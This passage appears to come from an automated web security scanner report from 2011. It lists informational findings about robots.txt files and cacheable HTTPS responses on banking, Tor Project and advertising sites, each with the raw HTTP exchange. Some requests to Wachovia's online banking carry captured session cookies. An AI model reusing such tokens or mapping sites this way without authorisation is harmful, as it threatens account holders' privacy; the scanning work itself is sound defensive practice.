GET /robots.txt HTTP/1.0
Host: secure2.internode.on.net

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 10:08:04 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 15 May 2008 05:42:30 GMT
ETag: "209e3-a7-44d3e5cf95d80"
Accept-Ranges: bytes
Content-Length: 167
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /errors/
Disallow: /templates/
Disallow: /about/careers/
Disallow: /webtools/advisories/
Disallow: ~

User-agent: Googlebot-Image
Disallow: /


19.23. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sensor2.suitesmart.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 01:37:19 GMT
ETag: "1f003b-1a-49c70702b51c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

19.24. http://static.suitesmart.com/cs/99845/tags/dfa.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.suitesmart.com
Path:   /cs/99845/tags/dfa.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.suitesmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Feb 2011 19:17:23 GMT
ETag: "1a5d3-1a-49c6b216bf6c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Tue, 19 Jul 2011 01:58:24 GMT
Connection: close
Cache-Control: no-store

User-agent: *
Disallow: /

19.25. http://themes.googleusercontent.com/static/fonts/molengo/v1/z1JWuCBrQt_Ta83eqIo6Dg.woff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://themes.googleusercontent.com
Path:   /static/fonts/molengo/v1/z1JWuCBrQt_Ta83eqIo6Dg.woff

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: themes.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 19 Jul 2011 01:59:49 GMT
Expires: Tue, 19 Jul 2011 01:59:49 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

19.26. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wellsoffice.wellsfargo.com
Path:   /ceoportal/signon/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wellsoffice.wellsfargo.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:42:29 GMT
Content-length: 27
Content-type: text/plain
Last-modified: Sat, 10 Jul 2010 03:27:46 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /


19.27. http://www.codero.com/images/design/menu_i7-promo.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.codero.com
Path:   /images/design/menu_i7-promo.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.codero.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:56 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.2.10 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 01 Apr 2011 16:15:45 GMT
ETag: "43ef04-93-b8de2e40"
Accept-Ranges: bytes
Content-Length: 147
Cache-Control: max-age=0, proxy-revalidate
Expires: Tue, 19 Jul 2011 01:59:56 GMT
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /hosting/
Allow: /

User-agent: Adsbot-Google
Allow: /hosting/
Allow: /

sitemap: http://www.codero.com/sitemap.xml

19.28. http://www.defaultroute.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.defaultroute.com

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 01:59:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
X-Pingback: http://www.defaultroute.com/xmlrpc.php
Content-Length: 77
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.defaultroute.com/sitemap.xml.gz

19.29. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Tue, 19 Jul 2011 01:59:22 GMT
Expires: Tue, 19 Jul 2011 01:59:22 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

19.30. http://www.googleadservices.com/pagead/conversion/1031455071/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1031455071/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
Date: Tue, 19 Jul 2011 01:59:56 GMT
Expires: Tue, 19 Jul 2011 01:59:56 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

19.31. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthcentral.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CUR CONi OUR DELi SAMi OTRi STP STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Accept-Ranges: bytes
Last-Modified: Tue, 01 Mar 2011 21:19:28 GMT
ETag: "1CBD85658DF3000:1CC45B7680520C0"
Content-Type: text/plain
Content-Length: 1057
Expires: Tue, 19 Jul 2011 01:58:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 01:58:55 GMT
Connection: close
Set-Cookie: THCN=r4172361686; path=/; expires=Fri, 1 Jan 2010 01:01:50 GMT

User-agent: *
Sitemap: http://www.healthcentral.com/hc_sitemap.xml
Sitemap: http://www.healthcentral.com/common/h/sitemaps/google_index.xml
Sitemap: http://www.healthcentral.com/profiles/c/sitemaps
...[SNIP]...

19.32. http://www.internode.on.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internode.on.net
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.internode.on.net

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 10:03:48 GMT
Server: Apache
Last-Modified: Thu, 09 Dec 2010 00:37:34 GMT
Accept-Ranges: bytes
Content-Length: 194
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /errors/
Disallow: /templates/
Disallow: /about/careers/
Disallow: /webtools/advisories/
Disallow: /contact/online/
Disallow: ~

User-agent: Googlebot-Image
Disallow: /


19.33. http://www.printfection.com/torprojectstore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.printfection.com
Path:   /torprojectstore

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.printfection.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:20 GMT
Server: Apache
Last-Modified: Thu, 15 Nov 2007 05:15:59 GMT
ETag: "37b84cd-18-c70661c0"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

19.34. http://www.rockhall.co.uk/ContactStyles  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /ContactStyles

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rockhall.co.uk

Response

HTTP/1.1 200 OK
Content-Length: 381
Content-Type: text/plain
Last-Modified: Sun, 15 Nov 2009 18:31:23 GMT
Accept-Ranges: bytes
ETag: "e6b88cd52166ca1:2407e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 01:59:56 GMT
Connection: close

# Default modx exclusions
User-agent: *
Disallow: /assets/cache/
Disallow: /assets/docs/
Disallow: /assets/export/
Disallow: /assets/import/
Disallow: /assets/modules/
Disallow: /assets/plugins
...[SNIP]...

19.35. http://www.scout.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://www.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:16c7"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 12:04:46 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

19.36. https://www.torproject.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torproject.org
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.torproject.org

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:47 GMT
Server: Apache
Last-Modified: Mon, 18 Jul 2011 17:59:17 GMT
Accept-Ranges: bytes
Content-Length: 118
Cache-Control: max-age=43200
Expires: Tue, 19 Jul 2011 13:58:47 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=15768000
Connection: close
Content-Type: text/plain
Content-Language: en

Sitemap: http://www.torproject.org/sitemap.xml
Sitemap: https://www.torproject.org/sitemap.xml
User-Agent: *
Allow: /

19.37. https://www.torservers.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torservers.net
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.torservers.net

Response

HTTP/1.0 200 OK
Strict-Transport-Security: max-age=31556926;includeSubDomains
X-Content-Security-Policy: allow 'self' *.torservers.net
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "4021895836"
Last-Modified: Sat, 16 Apr 2011 21:17:11 GMT
Content-Length: 53
Connection: close
Date: Tue, 19 Jul 2011 01:58:32 GMT
Server: lighttpd

User-agent: *
Disallow: /images/
Disallow: /mirrors/

19.38. https://www.wachovia.com/enroll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /enroll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wachovia.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:50:44 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 13 May 2011 16:50:12 GMT
Accept-Ranges: bytes
Content-Length: 15987
Cache-Control: max-age=-4554032
Expires: Fri, 27 May 2011 16:50:12 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Keep-Alive: timeout=10, max=77
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /foundation/v/index.jsp?vgnextoid=dda5496364704210VgnVCM100000617d6fa2RCRD&vgnextnoice=1
Disallow: /foundation/v/index.jsp?vgnextoid=bb69e72b79704210VgnVCM100000617d6fa2RCRD&
...[SNIP]...

19.39. http://www.wellsfargo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wellsfargo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wellsfargo.com

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:42:31 GMT
Content-length: 7033
Content-type: text/plain
Last-modified: Tue, 28 Jun 2011 01:56:46 GMT
Accept-ranges: bytes
Connection: close

# robots.txt for www.wellsfargo.com
# Last generated Tue May 1 09:06:35 2001
User-agent: *
Disallow: /ads/
Disallow: /akamai/
Disallow: /auxiliary_access/
Disallow: /bop/
Disallow: /browser/
Disallow
...[SNIP]...

19.40. https://www.wellsfargo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wellsfargo.com

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:41:00 GMT
Content-length: 7033
Content-type: text/plain
Last-modified: Tue, 28 Jun 2011 01:56:46 GMT
Accept-ranges: bytes
Connection: close

# robots.txt for www.wellsfargo.com
# Last generated Tue May 1 09:06:35 2001
User-agent: *
Disallow: /ads/
Disallow: /akamai/
Disallow: /auxiliary_access/
Disallow: /bop/
Disallow: /browser/
Disallow
...[SNIP]...

19.41. https://www.wellsfargoadvisors.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wellsfargoadvisors.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:53:09 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 01 Jun 2011 16:00:13 GMT
ETag: "a07-3c-9da2dd40"
Accept-Ranges: bytes
Content-Length: 60
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /dsip
Disallow: /outlook/index.htm

20. Cacheable HTTPS response  previous  next
There are 39 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


20.1. https://onlineservices.wachovia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069112331-New%7C1342605112331%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%255E%255EReset%2520your%2520password%255E%255E/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%2520%257C%2520Reset%2520your%2520password%255E%255E%3B%20s_sq%3Dwachoviaglobal%252Cwachovialive%253D%252526pid%25253D/Wachovia%25252520Miscellaneous/Home/Forgot%25252520Password%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//onlineservices.wachovia.com/identity/IdentityMgr%2525253Faction%2525253DsecondaryPresentLogin%25252526nextpage%2525253DPW_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446; CookiesAreEnabled=yes

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:51:51 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 26 Sep 2006 19:27:26 GMT
ETag: "ac0e4-1cee-4be78380"
Accept-Ranges: bytes
Content-Length: 7406
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

......00..........6... ......................h.......(...0...`............
......................................................................k...H...%............z...b...Js..2P.............k...Hs
...[SNIP]...

20.2. https://onlineservices.wachovia.com/ols/css/interference.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /ols/css/interference.css

Request

GET /ols/css/interference.css HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
Referer: https://onlineservices.wachovia.com/identity/IdentityMgr?action=secondaryPresentLogin&nextpage=PWRESET&returnurl=http%3a//www.wachovia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069112331-New%7C1342605112331%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%255E%255EReset%2520your%2520password%255E%255E/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%2520%257C%2520Reset%2520your%2520password%255E%255E%3B%20s_sq%3Dwachoviaglobal%252Cwachovialive%253D%252526pid%25253D/Wachovia%25252520Miscellaneous/Home/Forgot%25252520Password%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//onlineservices.wachovia.com/identity/IdentityMgr%2525253Faction%2525253DsecondaryPresentLogin%25252526nextpage%2525253DPW_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:51:48 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 26 Sep 2006 19:27:26 GMT
ETag: "b417f-2f-4be78380"
Accept-Ranges: bytes
Content-Length: 47
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/css

/@import url("/ols/css/handheld.css") handheld;

20.3. https://www.torproject.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torproject.org
Path:   /

Request

GET / HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
Referer: https://www.torservers.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:45 GMT
Server: Apache
Content-Location: index.html.en
Vary: negotiate,accept-language,Accept-Encoding
TCN: choice
Last-Modified: Mon, 18 Jul 2011 17:59:16 GMT
Accept-Ranges: bytes
Cache-Control: max-age=43200
Expires: Tue, 19 Jul 2011 13:58:45 GMT
Strict-Transport-Security: max-age=15768000
Content-Length: 12553
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tor Project: Anonymity Online</title>
<link rel="shortcut icon" type="image/x-icon"
...[SNIP]...

20.4. https://www.torproject.org/css/master.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torproject.org
Path:   /css/master.css

Request

GET /css/master.css HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
Referer: https://www.torproject.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:48 GMT
Server: Apache
Last-Modified: Mon, 18 Jul 2011 17:59:18 GMT
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Tue, 26 Jul 2011 01:58:48 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=15768000
Content-Length: 87
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css
Content-Language: en

@charset "UTF-8";
@import "reset.css";
@import "layout.css";
@import "typography.css";

20.5. https://www.torproject.org/docs/documentation.html.en  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torproject.org
Path:   /docs/documentation.html.en

Request

GET /docs/documentation.html.en HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:24 GMT
Server: Apache
Last-Modified: Mon, 18 Jul 2011 17:59:18 GMT
Accept-Ranges: bytes
Cache-Control: max-age=43200
Expires: Tue, 19 Jul 2011 13:59:24 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=15768000
Content-Length: 19917
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tor: Documentation</title>
<link rel="shortcut icon" type="image/x-icon" href="../im
...[SNIP]...

20.6. https://www.torservers.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torservers.net
Path:   /

Request

GET / HTTP/1.1
Host: www.torservers.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31556926;includeSubDomains
X-Content-Security-Policy: allow 'self' *.torservers.net
Content-type: text/html
Date: Tue, 19 Jul 2011 01:58:30 GMT
Server: lighttpd
Content-Length: 6605

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

20.7. https://www.torservers.net/donate.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.torservers.net
Path:   /donate.html

Request

GET /donate.html HTTP/1.1
Host: www.torservers.net
Connection: keep-alive
Referer: https://www.torservers.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31556926;includeSubDomains
X-Content-Security-Policy: allow 'self' *.torservers.net
Content-type: text/html
Date: Tue, 19 Jul 2011 01:59:32 GMT
Server: lighttpd
Content-Length: 24791

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

20.8. https://www.wachovia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /

Request

GET / HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:53:19 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 07 Jul 2011 23:00:15 GMT
Accept-Ranges: bytes
Cache-Control: max-age=220015
Expires: Thu, 21 Jul 2011 23:00:15 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Content-Length: 26382
Keep-Alive: timeout=10, max=158
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wachovia - Person
...[SNIP]...

20.9. https://www.wachovia.com/enroll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /enroll

Request

GET /enroll HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:50:44 GMT
Server: IBM_HTTP_Server
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 10558


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

20.10. https://www.wachovia.com/files/pres/interference.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /files/pres/interference.css

Request

GET /files/pres/interference.css HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
Referer: https://www.wachovia.com/enroll
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
